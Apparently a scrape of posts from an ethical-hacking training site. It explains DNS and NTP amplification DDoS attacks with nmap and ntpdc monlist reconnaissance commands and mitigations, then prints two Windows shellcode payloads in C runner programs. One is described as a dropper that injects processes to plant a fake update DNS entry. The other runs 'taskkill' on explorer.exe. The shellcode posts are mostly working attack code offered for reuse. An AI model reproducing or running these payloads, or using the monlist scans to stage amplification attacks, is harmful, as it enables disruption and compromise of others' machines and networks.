The DNS response is generally larger than a DNS Query made, using this attacker tries to achieve this attack by spoofing a small query, which in turn generates a large response.

The second being that the DNS Queries use UDP Transport, which makes it easier for an attacker to spoof the source address.

The attacker identifies the set of resolvers that can be used as reflectors. Then from the compromised machines across the globe the attacker makes DNS Queries which is sent to the reflecting resolvers, with the spoofed source IP Address of the Victim. And then the reflecting servers process the queries and send the responses to the targeted IP Address. A botnets many amplified requests allows the attacker to initiate a large attack with small amount of outgoing bandwidth usage.

At the victims side it is a bombarding of humongous amount of unrequested DNS responses from nameservers. And henceforth making it highly impossible to trace the attacker as the packets sent to the victim are not at all from the attackers machine directly and even more difficult to block the responses individually.
There are some tools available on the internet that would perform such type of attacks. Although the number of misconfigured DNS servers are low because of the mitigation techniques and patches.
One of the tool that is simple implementation of such attack was written by MARK OSBORNE.
General Info:

Tool is written in C language and uses built in network libs.
Attacker needs to provide the basic information such as
SPOOFED_IP, TARGET DNS, RESOLVER QUERY

Uses raw sockets and implements UDP and DNS header structures.
Working:

After accepting the input parameters, it queries the DNS server with spoofed IP address provided by the attacker.
It then outputs the information such as input parameters, query length, overall DNS length etc.

Mitigations:

1. Firewall: Is capable of dropping the packets from the unknown or unwanted IP address. Desired configuration can reduce this attack upto some extent as IP address might change after some duration of time.

2. BCP38: The concept of amplification is related to spoofed IP address, BCP38 is the mechanism used to verify the IP address. ISP’s are responsible for implementing this mechanism.

3. Third party services: Premium services such as CloudFlare protects from such type of DDOS and helps to conceal the original IP address of the host.

4. Configuring DNS: Configure to identify the stealth DNS requests as well as no recursion to non-local IP address. Making sure the DNS server is not open DNS server.

NTP Based Amplification Attacks.

It is quite well known that the Internet Hosts across the globe use the Network Time Protocol to synchronize their clocks. Its ubiquitous use across the globe range from systems of various types and sizes. This is because of its accuracy and reliable for services such as authentication services, servers and phones as well. NTP is commonly used to sync times for systems over the Internet and local networks. If you've ever set the time on your PC or network router with an internet timer server, then you have used NTP. With NTP being used so widely it is necessary and important for the NTP infrastructure to be secure and moreover trustworthy.

NTP generally runs on “UDP port 123”. As NTP is one of the protocols that is generally forgotten once it is configured by the administrators, and henceforth it is a Protocol that is not often updated on a regular basis, and this in turn leads to various NTP based Attacks.

NTP Based Attacks have become quite common in the recent days with most of the Gaming and Online Services being targeted. As just like DNS, NTP is an UDP based protocol that can be used to return a large reply for a small request. In a reflection attack, generally an attacker spoofs his IP to the victim’s IP Address, and then sends a request to some vulnerable servers on the Internet, and when these servers reply, the reply will be sent to the victim’s IP that was forged. If the attacker makes requests to multiple vulnerable servers and they reply back to the victim at the same time hence the victim will face humongous amount of traffic.

An NTP Reflection Attack becomes even stronger and powerful when it is amplified, this happens when a small request results in a large reply from the servers. Here the attacker generates large amount of UDP Packets with spoofing the Source IP, and then these UDP Packets are sent to NTP Servers on port 123 which support the MONLIST Command.(MONLIST is generally a remote command in previous versions of BTP that requests the list of last 600 hosts that had connected to that server). This MONLIST Command is a very useful recon tool for attackers. And if the NTP Server has its MONLIST being completely populated, then the response given to a MONLIST request will be 206 times than the actual request. Hence leading to a DDOS Attack on the victim.

ShodanHQ Results for NTP:

The below image shows how the Amplification attack works.

NSE Script to scan open NTP Servers:
> nmap -sU --scrit=ntp-monlist.nse <ip address of target>

NTPD Monlist Command:
> ntpdc -c monlist <ip address of target>

NTP Help Menu:
> ntpdc --help

Mitigation:

So, with the kind of UDP based amplification attacks on the rise it is necessary for enterprises to take the necessary mitigation steps.

All the attacks such as NTP Amplification attacks and other UDP based Amplification attacks completely depend on spoofing of Source IP Addresses. And if the attacker cannot spoof the IP Address of the victim, then the attacker can only DDOS himself.
One of the easiest mitigation method includes updating the NTP to version 4.2.7, NTP version 4.2.7 removes the MONLIST query entirely.

Or another mitigation would be starting the NTP Daemon with NTP Config file having noquery enabled, this disables access to the MONLIST.

Another mitigation would be to ensure that BCP38 being followed on your network. BCP38 is “Best Current Practice” published by the IETF which outlines methods useful in filtering out packets which are injected with a spoofed source address into a network. Which helps extensively in keeping your network safe and away from DDOS Attacks.

www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune

Inserting Fake Update DNS in Windows 8 through shellcode Unknown rwxr-xr-x 0 3/09/2014 Exploit | Penetration

Filename	Inserting Fake Update DNS in Windows 8 through shellcode
Permission	rw-r--r--
Author	Unknown
Date and Time	3/09/2014
Label	Exploit\| Penetration
Action

Ethical Hacking Institute in Pune
./Arizona Team

This post will elaborate how to add a fake update DNS with help of shellcode. In CEH class we have already seen how metasploit can be used to make changes in DNS, this is a more advance dropper that can be used to inject any process for the current example I have taken a explorer process.

The embedded code is as follow, go through the code understand the logic and generate your own code remember you need your metasploit updated to replicate the scenario. If you have and problem in understanding you can shoot your query to instructor@arizonainfotech.com or you can get to us through our facebook page:

Code:
#include <iostream>
using namespace std;
char code[] = "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8"

int main(){printf("Shellcode Length is : %u\n",strlen(code));system("PAUSE");
int (*_13)() = (int(*)())code; _13(); }

www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune

Windows 8 Remote Explorer Kill with Shell Code Unknown rwxr-xr-x 0 3/05/2014 Exploit | Penetration

Filename	Windows 8 Remote Explorer Kill with Shell Code
Permission	rw-r--r--
Author	Unknown
Date and Time	3/05/2014
Label	Exploit\| Penetration
Action

Ethical Hacking Institute in Pune
./Arizona Team

This post will elaborate how to take down a Explorer with help of shellcode. In CEH class we had created a dropper with exe extension, this is a more advance dropper that can be used to inject any process for the current example I have taken a explorer process.

The assembly logic flow is as below, this is a advance call to the same thing which was shown to you in buffer overflow class i.e the memory addresses of all the elements:

00401000 > $ 33F6           XOR ESI,ESI
00401002   . 33C9           XOR ECX,ECX
00401004   . 64:8B71 30     MOV ESI,DWORD PTR FS:[ECX+30]
00401008   . 8B76 0C        MOV ESI,DWORD PTR DS:[ESI+C]
0040100B   . 8B76 1C        MOV ESI,DWORD PTR DS:[ESI+1C]
0040100E   . 33DB           XOR EBX,EBX
00401010   > 43             INC EBX
00401011   . 8B6E 08        MOV EBP,DWORD PTR DS:[ESI+8]
00401014   . 8B7E 20        MOV EDI,DWORD PTR DS:[ESI+20]
00401017   . 8B36           MOV ESI,DWORD PTR DS:[ESI]
00401019   . B8 11111111    MOV EAX,11111111
0040101E   . B9 14111111    MOV ECX,11111114
00401023   . 2BC8           SUB ECX,EAX
00401025   . 8BD1           MOV EDX,ECX
00401027   . 3BDA           CMP EBX,EDX
00401029   .^75 E5          JNZ SHORT messageb.00401010
0040102B   . B9 73311111    MOV ECX,11113173
00401030   . 2BC8           SUB ECX,EAX
00401032   . 03E9           ADD EBP,ECX
00401034   . 8BD4           MOV EDX,ESP
00401036   . B9 10211111    MOV ECX,11112110
0040103B   . 2BC8           SUB ECX,EAX
0040103D   . 2BD1           SUB EDX,ECX
0040103F   . B9 636D6420    MOV ECX,20646D63
00401044   . 890A           MOV DWORD PTR DS:[EDX],ECX
00401046   . B9 2F6B2074    MOV ECX,74206B2F
0040104B   . 894A 04        MOV DWORD PTR DS:[EDX+4],ECX
0040104E   . B9 61736B6B    MOV ECX,6B6B7361
00401053   . 894A 08        MOV DWORD PTR DS:[EDX+8],ECX
00401056   . B9 696C6C20    MOV ECX,206C6C69
0040105B   . 894A 0C        MOV DWORD PTR DS:[EDX+C],ECX
0040105E   . B9 2F696D20    MOV ECX,206D692F
00401063   . 894A 10        MOV DWORD PTR DS:[EDX+10],ECX
00401066   . B9 6578706C    MOV ECX,6C707865
0040106B   . 894A 14        MOV DWORD PTR DS:[EDX+14],ECX
0040106E   . B9 6F726572    MOV ECX,7265726F
00401073   . 894A 18        MOV DWORD PTR DS:[EDX+18],ECX
00401076   . B9 2E657865    MOV ECX,6578652E
0040107B   . 894A 1C        MOV DWORD PTR DS:[EDX+1C],ECX
0040107E   . B9 202F696D    MOV ECX,6D692F20
00401083   . 894A 20        MOV DWORD PTR DS:[EDX+20],ECX
00401086   . B9 20636D64    MOV ECX,646D6320
0040108B   . 894A 24        MOV DWORD PTR DS:[EDX+24],ECX
0040108E   . B9 2E657865    MOV ECX,6578652E
00401093   . 894A 28        MOV DWORD PTR DS:[EDX+28],ECX
00401096   . B9 31407711    MOV ECX,11774031
0040109B   . 2BC8           SUB ECX,EAX
0040109D   . 894A 2C        MOV DWORD PTR DS:[EDX+2C],ECX
004010A0   . 33DB           XOR EBX,EBX
004010A2   . 8BF4           MOV ESI,ESP
004010A4   . B9 65111111    MOV ECX,11111165
004010A9   . 2BC8           SUB ECX,EAX
004010AB   . 8D4E AC        LEA ECX,DWORD PTR DS:[ESI-54]
004010AE   . 51             PUSH ECX
004010AF   . 8D4E BC        LEA ECX,DWORD PTR DS:[ESI-44]
004010B2   . 51             PUSH ECX
004010B3   . 53             PUSH EBX
004010B4   . 53             PUSH EBX
004010B5   . B9 31131111    MOV ECX,11111331
004010BA   . 2BC8           SUB ECX,EAX
004010BC   . 51             PUSH ECX
004010BD   . 53             PUSH EBX
004010BE   . 53             PUSH EBX
004010BF   . 53             PUSH EBX
004010C0   . 52             PUSH EDX
004010C1   . 53             PUSH EBX
004010C2   . FFD5           CALL EBP
004010C4   . 33F6           XOR ESI,ESI
004010C6   . 33C9           XOR ECX,ECX
004010C8   . 64:8B71 30     MOV ESI,DWORD PTR FS:[ECX+30]
004010CC   . 8B76 0C        MOV ESI,DWORD PTR DS:[ESI+C]
004010CF   . 8B76 1C        MOV ESI,DWORD PTR DS:[ESI+1C]
004010D2   . 33DB           XOR EBX,EBX
004010D4   > 43             INC EBX
004010D5   . 8B6E 08        MOV EBP,DWORD PTR DS:[ESI+8]
004010D8   . 8B7E 20        MOV EDI,DWORD PTR DS:[ESI+20]
004010DB   . 8B36           MOV ESI,DWORD PTR DS:[ESI]
004010DD   . B8 11111111    MOV EAX,11111111
004010E2   . B9 13111111    MOV ECX,11111113
004010E7   . 2BC8           SUB ECX,EAX
004010E9   . 8BD1           MOV EDX,ECX
004010EB   . 3BDA           CMP EBX,EDX
004010ED   .^75 E5          JNZ SHORT messageb.004010D4
004010EF   . B8 11111111    MOV EAX,11111111
004010F4   . B9 37261411    MOV ECX,11142637
004010F9   . 2BC8           SUB ECX,EAX
004010FB   . 03E9           ADD EBP,ECX
004010FD   . FFD5           CALL EBP

The embedded code is as follow, go through the code understand the logic and generate your own code remember you need your metasploit updated to replicate the scenario. If you have and problem in understanding you can shoot your query to instructor@arizonainfotech.com or you can get to us through our facebook page:

Code:
#include <iostream>
using namespace std;

char code[] = "\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33"
"\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x14"
"\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB9\x73\x31\x11"
"\x11\x2B\xC8\x03\xE9\x8B\xD4\xB9\x10\x21\x11\x11\x2B\xC8\x2B\xD1\xB9"
"\x63\x6D\x64\x20\x89\x0A\xB9\x2F\x6B\x20\x74\x89\x4A\x04\xB9"
"\x61\x73\x6B\x6B\x89\x4A\x08\xB9\x69\x6C\x6C\x20\x89\x4A\x0C\xB9\x2F"
"\x69\x6D\x20\x89\x4A\x10\xB9\x65\x78\x70\x6C\x89\x4A\x14\xB9"
"\x6F\x72\x65\x72\x89\x4A\x18\xB9\x2E\x65\x78\x65\x89\x4A\x1C\xB9\x20"
"\x2F\x69\x6D\x89\x4A\x20\xB9\x20\x63\x6D\x64\x89\x4A\x24\xB9"
"\x2E\x65\x78\x65\x89\x4A\x28\xB9\x31\x40\x77\x11\x2B\xC8\x89\x4A\x2C"
"\x33\xDB\x8B\xF4\xB9\x65\x11\x11\x11\x2B\xC8\x8D\x4E\xAC\x51"
"\x8D\x4E\xBC\x51\x53\x53\xB9\x31\x13\x11\x11\x2B\xC8\x51\x53\x53\x53"
"\x52\x53\xFF\xD5\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C"
"\x8B\x76\x1C\x33\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11"
"\x11\x11\xB9\x13\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5"
"\xB8\x11\x11\x11\x11\xB9\x37\x26\x14\x11\x2B\xC8\x03\xE9\xFF\xD5";

int main(){printf("Shellcode Length is : %u\n",strlen(code));system("PAUSE");
    int (*_13)() = (int(*)())code; _13(); }

www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune